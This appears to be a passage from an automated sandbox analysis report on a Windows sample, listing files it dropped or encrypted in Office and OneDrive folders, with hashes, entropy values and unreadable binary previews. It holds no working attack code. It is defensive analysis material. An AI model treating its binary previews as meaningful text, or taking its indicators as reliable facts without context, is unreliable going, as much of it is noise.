                                                                                                                                                  Size (bytes):1696
                                                                                                                                                  Entropy (8bit):7.881506118684372
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:4O60OvVxkWokia1UOyoNT8uK+p1dweCWiJv850lX5jD:r6yvkia1UO58urwvWIKgJv
                                                                                                                                                  MD5:A247D658B867A587309AE50AC34ABC92
                                                                                                                                                  SHA1:67A03F25718E0311577F15B4ED0147BC1803E151
                                                                                                                                                  SHA-256:A44480B5D6097BADE1199DF910C6A76755AE6ED8F4B467872099D4DA86FD7B68
                                                                                                                                                  SHA-512:D870C3872B9B5F5B002E518358771019043BE93F6A4BC6EFB56B709EC673E9F6D66C50C4B70E02F80587AA6F1E92607AB8C0F44F987C8BF002D4D18C13F9B259
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?Zz..*...B...J.Ifq.....F.`.H....h..QHG.9.iK..o.R..B...O...f.yo.'Z..D.G!......O..L....3|[...v.. .DB.j."..~..*...wI...u..pk*i.._..{M.!.. ...G...KY....K.<`.e....}...q.-....0.#I.Ew.jx.0.].....x.=.....*P..UV.n.`m=Z..5.%.O...4.i....".u...v.=.-_..g......{./.F.k.SY.[.".3.&........W.me.$.+....*.A....P.ic....P._......T_..^!#...|.P....|[....-..g.2y.x&...+..8........H..+..A.O..,.K.HI....h~..)[a.XY&....$%.Wej".....^...Nk.`|.J.Mk..{.4o.).o...T&...<...J.=.I.m3#.9...=t.R.K.!.y..,(.]@...'.e....6.Z4.AL.......KSc................f+..F),...?.H.?v.:k...:.ll..o{..e....e....i..<B....g".WW".WH......b?b..=..Oz..b..n.^bG..-<........^#.+.D...#...s..m..OZ....."......FVZY.#.E..v\...c....Y@KG..(....c...P..W.5Y.DM..Z..............WJ`..i_+N.>......0Ya %...'-,..D..h.)..)C.t4.l.`.*..%......r..+.m3]>P...e....6...'.....me.S~.t..'m...../..3....o]..........(Y....I.`Rt..H.E.z']..7kp.Jc-)..cZ.ps.5}+....T..'.s..."G..w.E.9?.....@.....d..w8..[......!.b...8.L5.[..G...0.,..y....Nc..)q......$.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1733
                                                                                                                                                  Entropy (8bit):7.883135738875952
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:QlVRALv07nWI4sxV6tfho5/HPFeE5U6aieD:ebIv2/who9Hxi/im
                                                                                                                                                  MD5:E2C052B0F9497CA317BBCDF9BBECDA71
                                                                                                                                                  SHA1:F1CE67DB9CA77B7864160B33FD71C1F86592434B
                                                                                                                                                  SHA-256:5032A61767FE6617341C177253A4F7A7584CDE608033FA24A29274CA419C5900
                                                                                                                                                  SHA-512:7B846E122C2E3F7A6644C4B0E9386E83C5046EFA2C046B5E83352665DCF955598644E0127103B1071A910DD9657331D4A1504503B7501F3558C9046E53A9E217
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.u=J..g..r....*_'."6.{.0P.gK.................U$.K.....D.3.>.'......1...>j..hL..`5.Z..7.].B..MP...!\..S..V...H.........../Yc~.N.@}.. ..C.n."k...#......>}.."*qG.....ef..rc.[....{.5.(...T..j$.V.n.!...qD6......'W..C.)...C.........o.>U8y.V.y.....A.@aY......D...=......3.|.KR.>.<#.+...}..Kc.J...;t6.f!...c.sFCZ........!..5..H..6..>0.B9.wU..SB.0.q.U...&.uG...}......2.I.)R.r..1l\V..J.;T.fG#..@N......^l.n%|D..8.q.I:L#..._.-...>&..d.dq.WI..?........ ..<..x.k\._.....+...8.j..../Gp...\%a..&\.$p...y\.9^qn].w..P..{.RX&.6k..p.E\c..w}."...g.EU./f.-.Af..._...t..f.u..<."BEl,....XGJ.T~p}!&=..<.v.L...q...!...M....n=L...........q...o.K.s..um.T..P.z..S.j..S.L}e.<..iIZ.#......o+...7.lB.#`m.}.EE....m..I..&...W7..2...}l~.'..1......3.......p={.&..?<c...UUb..o....e.......V.....0@}.......mB[X....Z...jR...+.@.....R..t.V....w.L.....m...... .....3.<...f.E08n.[^....2......p.\......,..U......b-Is........z..6..j.@.....kO\c.=.J..E..7....G..5~....w..q..^..o....l"9CW.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1696
                                                                                                                                                  Entropy (8bit):7.895750959621594
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:3+6mE2eKOxltPx0pAvSl37fGnCzurPjy6cIQnBUhD:3+6mEUQPxyAvUjGLLmtIQGJ
                                                                                                                                                  MD5:8CC0578692BA8ACA6D03820F9A9FEB97
                                                                                                                                                  SHA1:B9A21DE76C499FA4CA8E30E95AECBE295C5343B1
                                                                                                                                                  SHA-256:F9EC05367C61CF77C30D6A11E670A6BC55FA804A359A6A0661D0603D42E91230
                                                                                                                                                  SHA-512:D340CC0C6F8F0399BCC506856308735AC9F1DD9E6AFD59039533E652EB554960642D12CDF0AB1D6AF30ABCD98FD907D636BEADEAA2863F4C2C093C11C97EC39B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.i.....W*.;j.LH....>%.f.;I.J...h/....q...]......0..m.h..&..4.....'8....L..Z..N..|i@7Q./v..h..8..c.I..y....XE..N...X:..l..Yr.6%.../....o.......W6.i.;Mb!..o...d.e.yXe...J.$..k|....>...xF....3.....0...r........}...............\q.}P6..R...S..K.>6O.....A..#~kk.K...E...14.....A..FB.<..o=.oJ...VH.l.2$...k".F/.}.....a..=..]z_/BtW...+y..2.k....$.P.7...8u.YD$.Kh...Oz..!.I.......\._.....5...RE...x.xG.....'/.0R......Zi....(....N.#.2P,.f/....i.:.r..Y..".~~p#.......d..^<5CYr...u .R)...O..k'0.0.I..'d.`.~......Wd../...*.h:.Nm.A..CD...=.._......J....Cr.?.5....sWNN.b...e..v...Z.-..Wv...Bt.&..M...R.Sa...=..zu..B.k.....$.=w.j..u`.=.L..u.....x.....(.lSj.0..TD..V.(6kK.x..od)uK"C.y..*.M1.f./V`.;.`.....^.b....+.i...1w......Z......s.........QI.}.b....6..U.......M.G.w..j.sC.........[.{.wHJ.....^.p...:...$R:.W]..op....Sk.g...s.....,H.P....... m...........BuY'..J.=%l$....!...2A.g..........C....7s?..@...L.m.umDc...b{{...... v}.....0-uu..N.BA...i-...2B..t0...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1733
                                                                                                                                                  Entropy (8bit):7.905328143112139
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vMf5/2qhyO4qxFFQAnjQ2D57/IHX+K5V31fmsAAufD:kB/2qVF3jQ2NzIHOQV3pml
                                                                                                                                                  MD5:931D83129B5B184F474F845CBB2613D4
                                                                                                                                                  SHA1:52638A9D5C2F0B77781AA270202E785D3D384E66
                                                                                                                                                  SHA-256:C852F83F8CB50E136A9F11546F49653B698CDCBAF930BB434A29D3816B78B6B5
                                                                                                                                                  SHA-512:5AD3938962656D480EF9CECB1360E9982485D311AC4B7C2C0F15B10092C630DCB3C501A9B99E1EB8C366F6CC66B0C8FDF83912CCF046E6E13E4508D72673194D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?..a.j_?.s.e......c.R...OM.R.?`.].W...........,.T.l-z.Sa..os~8..X..plee_..d.........E....l. 3."..T>...pv.R3...C...@.N..x.K..o.C..Z.f.,.<.fJ.w.D+T.Hx.2..B.8.E2`UF..lS..FUHC.3...!....^.3t..1....-.e...q8...Z../...`.....r.4.w...]......%_.........L.......h!..w.vH.......eeN..(.9...WB.d......D..|...q.1.....6..../.G...w.FPh.....'^\.....v..{..je..F..Wi(.n...&.<....R...bBxs\.+...t....}H.Y..N.5>.....n........`.......!4.Y..Q`.j[..)B...X^.`q..[4.[5..y.5......[.:v..w.7.QYE....A......./....*..v._...s5G..{0......~s..>.Q......?.=.PN>.....:.c%......t.y.......$;....%.E.wh,..?6.V....= ..h.j$..`....Nt8t....$....>..F..:{4a...o0 .6y.. ..u...W..$....d4j..].....X...iB.V1.....!..F..)i.!S......,..K.M%.rBo.P..A..Z.V......<.n.QXCs....,..N4....R20.m.......r/....S..O..9..@....QPV"./.<...jw`k.A...s..tL2....e...w.8...F.n...vK=.#.m...[.....hb..?.0\3dC.Bs.ty......PY_']...4...].Tr....n..+.(...%....G..u......g..no.:zj.T.!#F..1.......g.Lhc....1...x.6.SN.b.... .s

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1714
                                                                                                                                                  Entropy (8bit):7.891052488207349
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HNKg1pTH1r/YrMb7E0LJAg/NTEosmrNVMxjNxJD:4CTH1D95VtYlmRVCXh
                                                                                                                                                  MD5:F7E0E352E825BE5B1A3CDA9938721DBA
                                                                                                                                                  SHA1:DE23A621038510F2E7CC63553D5060C08898ED17
                                                                                                                                                  SHA-256:FAE89AECDEC7FE2FC8A6DE855D9287164C58D38D5942B1F36E3ED2B82D4211C8
                                                                                                                                                  SHA-512:978A63BC6D5696CF9986645C36A16066616BF82354B81067319072D0F13B03EF16D0FB86E68C055639C8C0B7AA2777B026DACF2AA98C2A18B12C55FEEAB80770
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?1..k.8.91.r..+.n.|5.........."/..yS....qU.....Q&.;.tf5.....T...s.2.e".....zI..,<b;...BV(Z~.....,u............y]vm:+....R^Tq.D..Tf.=z.*.............Cl.p.....r.....A.!....r+.c....-..I..$.72W..<.^..A...5..~. .I..a.I.T[_......!.Y...K.:M.'.....dHi..!...$7..#.8\WO...5....p.x ..].Z^.P.F_I.O3.e.xO.&..1{..Y.7..V ...$w....=W.. .8........E...r...5;.`w.?\s.Z~,L..w..\.R]\.:.%B/3h...3...K...8.._-..#.|).eW.._*...~V......9...,Oa,.EX...R.3...o.6{XB.Wb..[y.D.......P..o.D...(...C..j.B...D......!....*.U.T......k.=.......aD...=O.d.t<..+.N?7.')7.nB.Q....~.D.>.n.E.....q.X.v%R.[.n..+E.9...4...w.7|..G_... ...........M...m.L.......g U.&j.*$."J)V.SGS.mwZ..:l:.@tI.......j./..c.^.7.B....f[9cL'.{.g0.bb.:...4.X.tl.L..T...`.p..<..kb[...ZN....An...y..x..3..}.b.C...G...V$.?C...8i.Adf.E.gu>.u~...X.zW.Q>c.......]R.p..ep...xz...s>b..k.f.fd..,?..[..?(......z..{..g...=m.i.8..;..K.@.iMxs.t..1.....P..K.....q..#.G1:I&..V.........Vi...2FL=G..WU..+r8.........|....T..s.....QW.U

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1751
                                                                                                                                                  Entropy (8bit):7.891180040886137
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:cGhUXmScpLVTu+whU6QvUTjjyTmRey2uO/FzJRD:cGhU/cpLVLS2Aey2lZJZ
                                                                                                                                                  MD5:B330E288E57F7BDABDCB6737FD0DEF4B
                                                                                                                                                  SHA1:6466C65803B99728707560DC0CD8A287887A8573
                                                                                                                                                  SHA-256:CAD4133D76D873E084973EB48C5C74C26A7D07AB3D3E27EB5CF3C0233A63EF56
                                                                                                                                                  SHA-512:8B44B59B2AA5D7FAC346D94703FA22741CC6447D249BC0CF4B77E5E72249B24B3D241854CE8E66F1AF5D415E2C30FE5D69A234B5DDF36CCA33F0C057EAC8438F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.j.......nauV..2...E.D...H/?.I"..kuPvP....mj.rv.4,a......F......~..x.2..%...zO.d.G&H...l......Ev.'.2...`n.W.R@\.....M..R<...F.....5...f...5.x....P.d..t.p.l4t.F..Q..I...k......{.DS....OPa.a,~NB...O..}..+.o.-*.....j,...H..\.0.f..Q.Fz4..K.2rM!..p...|.Q.......x.T..A}.-\.=..@.......].....b.i.P.eW1...*.q....q.|/...J.G........PX..yB.RD.H.F1......!....k.nu~s..b.W......T...Qn....'Z]n.pF=.}w....]..I.x.}..1;...`..@3.C...t........I.3J..8.'..z~-S..`.........a..V.O.SX....K|....$...&(.O......*.....X.I.K..QGl.WLW.q/..|..*....Q.....S.$I....:...*.0L...~...'...g.Z/U.....r..A..s..pp...:.O./`.....X)F....i..?...aSn....]..... ..,....e..p.Vx...s])..6.:R...7.\...}.#..zn....11o..B.....b.<.7......T...;bS.......k...f........d..Z.+La.}.....QjqcK.T.=....$...P.$..y}..6v.>.BS.....+..Vn<t.w....{.W...ld..r~.SC4...qy.@.........eX.#Ey..w....@......L..|W...>5.n.x...#|.....C....c.9$...;f?Ys/PA..oD.f..@1..a..3.Y.J).....h....BP(.;<..V.......%.r...G.?4x.J).vec......n.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1583
                                                                                                                                                  Entropy (8bit):7.884729892234642
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:VYIFHXXxeihi/ZA/XqQvPz7FUOa3wwHJdvKaGtjD:yAXi/S/aSz7yvH3yjv
                                                                                                                                                  MD5:6C43FD6FE7C17C9D07CDD2CB3F9176F9
                                                                                                                                                  SHA1:6D474EB5D571EF552980CCC34663B610BFB6E37F
                                                                                                                                                  SHA-256:531068DE28601DE0EC494AF12923FA59D4003C11CD9A08385600B552720ED6E0
                                                                                                                                                  SHA-512:98B03673046250E3A19321644F3D350F53B1188A9AA76E588AFCCDE4AE9DB7CCBB99EE9909A33806B1AD378C68A47458EE08B99CB068ADCE45EF0F7C0C8E53F0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml. ......FN...hI)S....l;..C....B..s.lw.K6.x..<..t..p.WV9.q...7..r`h....n..Uk.|lW._T.`T.^0].cmi...........q4.g%t..h...@xK3.,y...}.W.X.f....,......]?.p#.\..^..`.R..d........5._.hV?..._.......#..(j.....!...3=.....F...L....0..%}u!.hZN..X..3.S#...).("=..y......J.0K/.....C3..<J.y*..:...%.P.W........s..!..rxn...:^._W}.Z....5...."..7.WKZ..@,F.A...^.z.U...f.j..;..\t.Y.+......)....,E.~..Y..9A<V...L..}.......Z..Es.V..[....qe..e'.....>S.-ChPy.."T...e.......b..dj...w.wA.k..l......k..*9"..c...G..?t...Sk.:)......."..^'....>>.....}+r&.P..E....j.%.V..',..(..[..&.............@h...R.iU.9...t..0.$K..A...u..5.u.s7g.P...:.1...+...2..XP..k'..c..*).2./..`.}3./...l....+."!...".M.-..E(..T9<...N..R@.,y._.`..-e.=c.5..U..Ja>..=...J ....t{~v0.'.....m........D............t..F.s..Y.f..qm(.U..|..~.t5=...s..}........U....1.!.3.......!0?.V.K....3...o".).~9.UKG.]...s-.J.-..Y&}LI][..x..W*...g=.eMn.._.3...?.3.7.h.65U2g.!^...3....?..).+nC|..z[..L...}..Em.x...N

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1154
                                                                                                                                                  Entropy (8bit):7.8519474068198765
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:M8bwfVjplLOj7XONyhvf900chgTzUxkS9RdKfHrs+BghtIhkArw9pHo2+2bD:M8applLMDONyhvl00chIUxkS9RdGRB8x
                                                                                                                                                  MD5:61332F592157DE21F9824C39069F0D18
                                                                                                                                                  SHA1:6AA0B342CB37B98B657ECF17BCBA71D71E8405E3
                                                                                                                                                  SHA-256:F5648901AE85CAB28D3052732F84B8298382AE485CEE9B0EE21E4A0B26542EF8
                                                                                                                                                  SHA-512:1EFD00252E49B1985A4E415B19683CFDD45928248945A7424CEBF634E3EE50FEF0B37AFBC87BCDC8C768990EB6984B13E3545642CE8D759DAB1C467C43E885EA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:3.7.4..e.r..wx-G..c....!z..C}...J.}.q:..G......`.aF.......E.F#vmY.@V..O...[........).....2B-.s............#.o.,..O...#.\s....0..G*....T(...R.;K..+...9.M.... ...!......?,_...N+.)C.:(;.4....cEwb..O.o.Fl".......ei..4... ...........%\...v.....^...........q...h....[.6.|.,W...K....91.).y...bp.;L.....H#.9.*Y.03...)......7...X;9.J..s\X...;N..\..l..<d..B..{...~.>yz0.Sg.,...)..9Z..iVp..3...'..r....1..{S.........:..L.=....zQ?x.`D......DN...zf.>.........QU....'..W..i.........a5....Z.<R;Lh!B@...7?.[G..nh....U.C...kK$.~.3Z....NY.#......Ms.6............L..9.S..{#.._d..d..b.........D../.......3.b.....e..N..j~W...Z...=..E...|O5...c.H.%......Z<.....iP)..H..-.\.......'...i:...A.j..i..o..0..t.......L$)v(4.ig.~.|M0.LVb-Q..)...6.V[..r...m...........t.s..z..e.%7.2.M...3X..(.8.$(.;3J.bg...........|2...5.;...M..YY..n....E.Iv...,..*....\.:..k.&T.C@73..]..2T..<./....|....-...*..(.......[..D..~.w.Wh.'.mH0d..\.x.B..RR. .I(..:`....,.d.pt..D./I.s,.'%..K`..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.992143345077302
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:/hJ9w10LDvw49FczK0muU6Ipjcygzbt/oCBc:pQ0HhFcm01U6+jcbzbs
                                                                                                                                                  MD5:57478CE0ECCE8ACBA9CC7FB48F30F419
                                                                                                                                                  SHA1:64AD75E98B8DC8A485F7B96F8A9EFD9C474F7B80
                                                                                                                                                  SHA-256:BCD24C8C1CDD2992544707064187D8113EB34499202E41C2E26EAFC5822E50FF
                                                                                                                                                  SHA-512:DD474A98690C724EDE4A2E783A10306F63213D02D4535FFB09397A71EF9A073872C8B8272EAE12CE48F4D55BB69EDDCA33404298C5061EC5B9FFF73019F9E498
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit..].?.+L}...$.k.Njuvo<...x....th..z.2..<ja..ZFv.X.U..B.)..e ..YH...]..ta[&..X.....E.$.I9...,\..=.i..]...+......tG....o.......o..@..8.^Wz..q8V...{....2..Uu......3...a.+X.........d.....,.R.k.-{...Y^z...=.L..w..lv,..7. j..[LGmSW..'..7|S..W..C..d....l.7.....$.V-P...\6x..^.../.TP.d..q...,.ph*..!...v..T...bA9@...:u.t.E0.....0..L-.\.n.....ku).......8."...x......f.).+_N.8...........4.vR .0.1.K.>...o....^Qk:.+.(.....tW....2....I.0.U8.._.8.i%mX.#..i...C..N......n..z~..}uYW.H..a.<...<.A)..qj.s..b./.&9@%..+z.....y........ .,.G.sm.t.o=.C.....jG#...y..m....<.J&..`...?...<v.......`...O.....$..%5|.Lijn..O.]+.y.w..=.....b../S....HT......n5^.>/.......d..Y...&......C.`....[......)?.U.*cW...>..`....N..In.b.V.%...z.s.!-.+..`CX\R~_CN.2...A.6...O\...4..WU.:.l*.............L.1...r.N.tj1...h.'.$.b.c.4.e.C....GS.t....^.Y...t.fK4?.d.....e.V..1.:R.......?&.g.Gwf.X.8.9.j..t:..Z..3.V...?w9....."...+........i......}.... S....\[(..e.w ........Tn.....Hq..3.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.991112276491091
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:mwwofOvH/3Y/NX8ZaXqTD3iFK57SLPkkhsTVkW:L1OvQ/VQcgGhs+W
                                                                                                                                                  MD5:7C90E71EF1BF08E3C4BB90E5CE7066A8
                                                                                                                                                  SHA1:C10BDC2CEBE4AE2B9122F656FEB566E45EE6E32A
                                                                                                                                                  SHA-256:D99E8C3B8C0A884442700E78989A23107EC688E70236EE8DBE9E9D6F017A1660
                                                                                                                                                  SHA-512:7FBCED1496AFDDB46870A26F7642ABE1E48DD5644B74DD23C38AC017E5EC162F599015C35D3940058FDC935FD3560682824DCADFD91806897E361058ACAEFE13
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitr...>)H'.v.kr....k.1Ky..mU.(g..$..I..s=.4.:...F.P....Z...b.~..k.'o....EIh/.'.$,..K.i,'S......m..6qL&.m.0/....z.........{C...'..b.......8.....|.]e...L..P..L.3O..........q.._N.......1s1E....v.#........Bgjk..bt...g...E.. )_.p..(....1..I7.Ouz....S....}..|_...H#...xg...P!.q0:..Q....H..h....~b.-..!..0.H..k.{..v...t.U$b...!.....l.Xe.....X...\..^g...A_...&.c.6.d.>.).%,=.Y.t..M...p....7...\..%|].6.DW...M}.%..8&.3R..j...?tF..C.QT%.V...v..vHn..."...o.2..]....{>...j...}..\,.&-W$-......./...|.>....A.$b...^.W.a.F....|.x...c.B......d.~}f..1....1]....W..<...Y....".C,.z.bu....U.s.e.....v...+.h...c ..8.'.@..b...L.'...%q.t..:...p.....R\..W..K.BJ.,..'....,...`..j.Y.u".L......o.....(..%.(p[...@x..l....QG...R.1......Q.S.d9J.k;......g......I..9..T.0........5...D./T{|).(O.P.6&}..i$.........+.....Z$T5.A.Qe....Z./y..o..u....U....D......@...~....Y...C...*GT=G.o..N}...N.".............I.....y8Tmr......IDP..s..b.a..../.:.`..H5z"N<U..z..)SR@T.P.s`....=.Z...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.993082734529845
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:QoiryHtvHo3tCeI9HXqz+1vmE612+VehIt2tHsWEQ8g4MA+5fVKG0eLnfQC+qoT:QoiryHpHeW6SLvZhr4MAcrHnfQwoT
                                                                                                                                                  MD5:D58CF4792FAE8660968329B5CDCAB892
                                                                                                                                                  SHA1:97284DD657467B70CDC387539C94D785C4192D59
                                                                                                                                                  SHA-256:0ED5F412EE14BE9751035A7EA1D7B61862DB7C4437CBB165AF9AD704395839CC
                                                                                                                                                  SHA-512:68F7B030AE002A00F4BE9751FF964B7EDC24627F68C63EECD91D3C33EF46850C5CEFCC3FD37990A4A69CA52BC8E9E9B1A2D152E845BBE21E4918D5E579561320
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitn.u.|.^AO.;`.!^M[..<...=.;.......7....P.O.B...:..2.}o.'W......I.9Z.........=..nK1r......N.lZ.W&.uw+<..H.f.=._s.c .a.c.#..L...|=.j...f.+.#..H.3.p.......-.8..C..T.."..j..i..5s.....*...]..#...q........o..3%..'....y.....}..a'/..9.Y....."..6!89,..2.c_nF.-..u}....~............{.f.0t.N.Oql....wb...&D...l...,.......n4.....Q.:...c7V...F.L......B4..@O...u.....6.|...!.<...Y.R...n..\X.E..U.n....=o..,...y...2!...>i8k.......{.J.~..RG..._.r49.<..a. .R...B.y...#.*...|..{.%=...}..,.`D.Aj8..gK.G..w...[(...".|..Mb.:W.........G...!\........&.........FoU.&.>:..MA.h%%...h......_8...0../s....A.sR.._Q.mg)..*...!;a./Y..|.S.dw..N.s......4.y..UL.`...it.?.q.A9.^....H%b;yt.%.'.:...Ye.^.#.....6....#.....v.Ly.".....wo2.9[.........A("... ..?@.....jo..'.."...D.Z...........{...3....Q.B.d5F....a..c.p..w.[.....Mj@..@:.+.1#.v... ....p..=PZ.%.2......$...e,w..!..f.@.o.nh.w......{.{...qK.....g[.l-)1!...d!.=..\@...M...../sp....'..X.|/.......J30n.......J.5x+V|7...w.R.'/..{...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.991588658553735
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:2uHEW8s+zQNYje14lCPsl2ScrO8Pzn8Cl94Uz42hzjD7efrZ7/d4wpFBLN0nn4tS:2M/GQN0F2jJ1l9/zvpXolFPTNonF
                                                                                                                                                  MD5:EBCCFF309BB4D722BD4BE0803FC9F979
                                                                                                                                                  SHA1:12373B7F2EB2B4A6235DC325C9D37F273388ACE6
                                                                                                                                                  SHA-256:E4C9D1DA1874FC5194CA1D342AD1A25032CDE46C330EC225EC017C670E09B5CF
                                                                                                                                                  SHA-512:933260D1D4F84940CD235C322B2E1047F580463D9F11E25995B1F7F45D69C678F61707513B82A40187974978855DA60E75A98E307E97E0F55435852184129AC3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitS.R..\....._5.d......Ia_.M..)M...........\....F....h=.d....U..,.n?..!,#..8..$...;..y.c$.\.a.Q...jFZ.X....j6(...Kw../Y.+...C..T|.......:^^v.."l2..}..4..RDC...#Cz..hyQ#.x...F..'% .b.....V.6x.2/5O.S...@..],_.0U....e..L....e.....+...[G.j...8=RB.k8s...!....-......a%F.l....e.f8...bc<....z_.q...J...."u..............'%.' ..{v[..O.4...3...f%0.J.%oo.d...l^}ZR.7g.....3.[. .o..}X.@.yn!..(.I|%..{N.....N..H.a..|.~...'.%o...J.^x!...x,.?...W........A.V....K.z..~}*._.....]S$|.....7.#xK...}w.......?...u@.=K..Pd.j...Y`..0R.....t.3.m:.`K.....XWQB.&:.6...)..S..Q.K_.~)..p[..RO..S..n.*..|...3X..*..Bc.......B<{.N>.@..... ..rAI.vE...]7..Sw>.|....W...iN...1...!..LN"...e...B...c7...&......;fw.K-f..V.z.[bi..n.j..... .&. w.j...k.a[N9JA.....34...v#.r?..~.wJ.........G.J....'.p6Pp,b,.?./.Z..T.i."..........*.X..f...M.Kf%.....s*.M7i..R..M2U.-P.k.-M.<.....42...[.{.g.....T.g..s.~6t...1..'.....IOC....U.......(...~....}pF.v(.c1.AS............B..w..RwJ*E.n.A.R/

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.1056.9124.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.042709818108005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:1t9IwNWCZkfDS0H0IwIPWo8lLjrL2Z+E1OiwFDkRRPqPCGnuXJNFN0sP:r9P4fDS20IFPWo8lHrLkxOiwuRS7Qn0
                                                                                                                                                  MD5:AED6B9B1F094189279050A2199D70BE5
                                                                                                                                                  SHA1:9A50BE45D0D78A25EFCFE48CA5285638F6DF0C07
                                                                                                                                                  SHA-256:8D956AE3DBEA931FF1ADD3A73A0C1CF27C9A7928D34856B45751F77C71F80914
                                                                                                                                                  SHA-512:B7B92A96FAA66D91BAA878D96E88F93FFFDA4F7B013061CF8602AFECDB3C8E94B41EB4FBFD85A5E6AF8A57FB91BA5B8B3D56A995E0DFE202A07E9FA5206487C6
                                                                                                                                                  Malicious:false
